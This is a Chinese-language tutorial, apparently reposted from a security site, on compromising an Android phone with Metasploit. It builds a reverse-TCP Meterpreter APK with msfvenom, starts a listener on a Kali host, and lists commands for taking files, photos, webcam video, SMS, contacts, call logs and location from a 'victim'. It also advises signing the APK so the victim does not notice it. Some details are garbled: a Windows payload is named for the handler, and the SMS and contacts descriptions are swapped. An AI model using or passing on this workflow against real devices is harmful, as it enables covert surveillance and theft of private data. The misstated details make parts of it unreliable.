Metasploit之渗透安卓实战

颓废 2019年5月19日10:17:14评论502 views字数 1341阅读4分28秒阅读模式

Metasploit之渗透安卓实战
参考文献:http://www.freebuf.com/articles/terminal/104407.html

在“09-Metasploit之我的远程控制软件”教程中,因为渗透的是Windows系统
所以选用了“windows/meterpreter/reverse_tcp”模块
而这里需要渗透安卓系统了,就选用“android/meterpreter/reverse_tcp”模块
那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/multi/handler”
并且,同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD

这里假设我的测试环境
kali-linux:  192.168.2.146
安卓模拟环境:192.168.2.107

参考命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > /root/Desktop/pentest.apk

我的命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk

命令解析:

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机(kali-linux的IP)

LPORT 设置用来接收反弹连接的端口(kali-linux的端口)

R 设置文件格式

Location 要保存的文件位置-->/root/Desktop/是桌面,没有目录表示当前系统Home目录下

PS:对于目前的安卓系统安全机制的考虑,因为没有签名证书可能导致无法安装或易被受害者识破
那么,签名证书的制作可以查看参考文献资料

开启metasploit,并且开启相关连接,设置

msfconsole

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 192.168.2.146

set LPORT 4444

exploit 

受害者安装并且打开会返回我们一个meterpreter连接

那么我们可以使用以下的一些常用的命令

cd               -->目录切换,命令:cd /  切换到根目录

search           -->搜索文件,命令:search *.jpg

download         -->下载文件,命令:download test.jpg

webcam_list      -->查看摄像头列表,因为手机都是前置和后置摄像头了

webcam_snap      -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1

webcam_stream    -->开启摄像头视频监控,同上,命令:webcam_stream -i 1

安卓系统相关命令:

check_root       -->查看当前安卓是否已经root

dump_calllog     -->下载通话记录

dump_contacts    -->下载短信记录

dump_sms         -->下载通讯录

geolocate        -->利用谷歌地图定位(需要安装谷歌地图)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:17:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之渗透安卓实战http://cn-sec.com/archives/67385.html

发表评论

匿名网友 填写信息